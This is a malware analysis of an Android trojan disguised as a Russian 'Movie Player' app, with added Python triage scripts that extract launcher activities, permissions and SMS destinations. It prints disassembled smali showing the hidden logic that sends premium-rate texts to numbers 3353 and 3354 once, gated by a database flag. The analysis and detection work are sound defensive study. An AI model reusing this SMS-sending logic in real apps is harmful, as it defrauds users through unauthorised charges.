Visible Symptoms

The victim will experience a high bill due to premium-rate SMS sending.

Installation step:

[screenshot: installation step]

Before launching:

After installing the sample with the .apk extension, a new "movie player" icon appears in the application panel. Launching the application for the first time displays a message in Russian while it is sending the SMS messages:

[screenshot: first launch]
Detailed Analysis

The trojan takes the appearance of a movie player aimed at the Russian community. In reality the application sends three SMS messages to two Russian premium-rate numbers. The customer is charged the first time she runs the application: for this purpose the trojan checks for the presence of an infection flag in a database, via a call to the routine "canwe":

```smali
.line 29
.local v6, dh:Lorg/me/androidapplication1/DataHelper;
invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;->canwe()Z
move-result v2
if-eqz v2, :cond_0
```
The malicious sample is delivered as an Android application package (.apk extension). This installation package contains the core application code (.dex), the resources (icon, strings, ...), the corresponding manifests and the file hashes:

```
res/drawable/icon.png
res/layout/main.xml
res/values/strings.xml
res/values/public.xml
META-INF/MANIFEST.MF
META-INF/CERT.RSA
META-INF/CERT.SF
classes.dex
resources.arsc
AndroidManifest.xml
```

The core file "classes.dex" is a Dalvik Executable. It is run by Android's Dalvik virtual machine, which uses its own byte code. Some tools disassemble this byte code into a low-level syntax similar to the Jasmin assembler used for Java:

```smali
.class public Lorg/me/androidapplication1/MoviePlayer;
.super Landroid/app/Activity;
.source "MoviePlayer.java"

# direct methods
.method public constructor
```

The manifest XML of the whole application tells us its "entry point": the MoviePlayer class. Reading that class reveals that the malicious behaviour is effective only once, thanks to a flag stored as a database entry.

```xml
<activity android:label="Movie Player" android:name=".MoviePlayer">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
```
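Locating the entry point from the manifest, as the analysis does by reading the `<activity>` block, can be done programmatically once the binary AndroidManifest.xml has been decoded to plain XML (for instance with apktool). The script below is an added example, not code from the original write-up: it lists the activities whose intent filter carries both the MAIN action and the LAUNCHER category, and the permissions the package declares. The manifest embedded in it is constructed: the activity block is the one quoted above, the package name comes from the disassembled class path, and the SEND_SMS permission line and the second activity are assumptions added to exercise the filter.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest (decoded form). The MoviePlayer activity block is
# the one quoted in the analysis; the package name is taken from the
# disassembled class path Lorg/me/androidapplication1/MoviePlayer. The
# SEND_SMS permission and the second, non-launcher activity are assumptions
# added here so that the filter below has something to exclude.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.me.androidapplication1">
    <uses-permission android:name="android.permission.SEND_SMS" />
    <application android:label="Movie Player">
        <activity android:label="Movie Player" android:name=".MoviePlayer">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".HelperActivity" />
    </application>
</manifest>
"""


def attr(elem, name):
    """Read an attribute from the android: namespace (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def launcher_activities(manifest_xml):
    """Return fully qualified class names of activities reachable from the launcher.

    An activity is an entry point when one of its intent filters declares both
    android.intent.action.MAIN and android.intent.category.LAUNCHER. A leading
    dot in android:name is shorthand for the package name.
    """
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    found = []
    for activity in root.iter("activity"):
        for intent_filter in activity.findall("intent-filter"):
            actions = {attr(a, "name") for a in intent_filter.findall("action")}
            categories = {attr(c, "name") for c in intent_filter.findall("category")}
            if ("android.intent.action.MAIN" in actions
                    and "android.intent.category.LAUNCHER" in categories):
                name = attr(activity, "name") or ""
                if name.startswith("."):
                    name = package + name
                found.append(name)
    return found


def declared_permissions(manifest_xml):
    """Return the sorted list of <uses-permission> names in the manifest."""
    root = ET.fromstring(manifest_xml)
    return sorted(attr(p, "name") for p in root.iter("uses-permission"))


if __name__ == "__main__":
    print("entry points:", launcher_activities(SAMPLE_MANIFEST))
    print("permissions:", declared_permissions(SAMPLE_MANIFEST))
```

The same two checks (which class the launcher starts, and whether the package asks for SMS sending at all) are the first things to look at when triaging a "player" that has no business sending messages.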
The malicious behaviour consists of sending an SMS to two Russian premium-rate numbers; one of these numbers is used twice.
```smali
.line 54
.local v0, m:Landroid/telephony/SmsManager;
const-string v1, "3353"
.line 55
.local v1, destination:Ljava/lang/String;
const-string v3, "798657"
.line 57
.local v3, text:Ljava/lang/String;
const/4 v2, 0x0
const/4 v4, 0x0
const/4 v5, 0x0
:try_start_0
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
...
.line 63
:goto_0
const-string v1, "3354"
...
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
...
const-string v1, "3353"
...
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
:try_end_2
```
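The reading done by hand above (which register holds which constant at the moment sendTextMessage is invoked) can be mechanised. The following Python script is an added example and not part of the original analysis: it walks a smali listing, tracks const-string and const assignments per register, and reports the destination number and message body at every sendTextMessage call, handling both the invoke-virtual/range form shown above and the plain invoke-virtual form. The embedded listing is constructed after the quoted disassembly (the method name sendPremiumSms and the getDefault() prologue are assumptions); it is meant for triage of output from a disassembler such as baksmali, not as a full smali parser.

```python
import re
from collections import Counter

# Constructed listing modelled on the disassembly quoted in the analysis.
# The method name and the SmsManager.getDefault() prologue are assumptions;
# the three sends and their constants are reproduced as listed above.
SAMPLE_SMALI = """\
.method private sendPremiumSms()V
    .locals 6

    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0

    .line 54
    const-string v1, "3353"
    .line 55
    const-string v3, "798657"
    .line 57
    const/4 v2, 0x0
    const/4 v4, 0x0
    const/4 v5, 0x0

    :try_start_0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V

    .line 63
    :goto_0
    const-string v1, "3354"
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V

    const-string v1, "3353"
    invoke-virtual {v0, v1, v2, v3, v4, v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    :try_end_2
.end method
"""

CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+(v\d+|p\d+),\s*"((?:[^"\\]|\\.)*)"')
CONST_NUM = re.compile(r'^\s*const(?:/4|/16|/high16)?\s+(v\d+|p\d+),\s*(\S+)')
INVOKE = re.compile(r'^\s*invoke-(?:virtual|direct|static|interface|super)(/range)?\s+\{([^}]*)\},\s*(\S+)')
SEND_TEXT = "Landroid/telephony/SmsManager;->sendTextMessage("


def expand_registers(range_flag, inner):
    """Turn '{v0 .. v5}' or '{v0, v1, v2}' contents into a register list."""
    inner = inner.strip()
    if not inner:
        return []
    if range_flag:
        lo, hi = (s.strip() for s in inner.split(".."))
        return ["%s%d" % (lo[0], i) for i in range(int(lo[1:]), int(hi[1:]) + 1)]
    return [r.strip() for r in inner.split(",")]


def find_sms_sends(smali):
    """Report destination and text for every SmsManager.sendTextMessage call.

    Register contents are tracked per method from const/const-string
    instructions only, which is enough for the straight-line code in the
    sample; values set by other instructions are reported as None.
    """
    regs = {}
    sends = []
    for lineno, line in enumerate(smali.splitlines(), 1):
        if line.strip().startswith(".method"):
            regs = {}  # register contents do not survive a method boundary
            continue
        m = CONST_STRING.match(line)
        if m:
            regs[m.group(1)] = m.group(2)
            continue
        m = CONST_NUM.match(line)
        if m:
            regs[m.group(1)] = None if m.group(2) == "0x0" else m.group(2)
            continue
        m = INVOKE.match(line)
        if m and m.group(3).startswith(SEND_TEXT):
            args = expand_registers(m.group(1), m.group(2))
            # args[0] is the SmsManager instance, followed by the parameters
            # destinationAddress, scAddress, text, sentIntent, deliveryIntent.
            sends.append({
                "line": lineno,
                "destination": regs.get(args[1]),
                "text": regs.get(args[3]),
            })
    return sends


def tally_destinations(sends):
    """Count how many times each destination number is messaged."""
    return dict(Counter(s["destination"] for s in sends))


if __name__ == "__main__":
    found = find_sms_sends(SAMPLE_SMALI)
    for s in found:
        print("line %d: to %s, text %r" % (s["line"], s["destination"], s["text"]))
    print("per destination:", tally_destinations(SAMPLE_SMALI and found))
```

Run against the constructed listing, it recovers the three sends, two to 3353 and one to 3354, all carrying the body "798657", which is exactly the picture the hand analysis above arrives at. On a real dump the numbers recovered this way are what an operator would hand to the carrier for blocking.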
For the record, the author probably started from the "HelloWorld" of the Android SDK; the hint comes from the "main.xml" file of the layout resources:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<LinearLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" xmlns:android="http://schemas.android.com/apk/res/android">
    <TextView android:layout_width="fill_parent" android:layout_height="wrap_content" android:text="Hello Android from NetBeans" />
</LinearLayout>
```

The corresponding class is never called; it was probably used to test the SMS-sending methods. We also found a different Russian message that can be translated as "Click OK to access the video library".
Recommended Action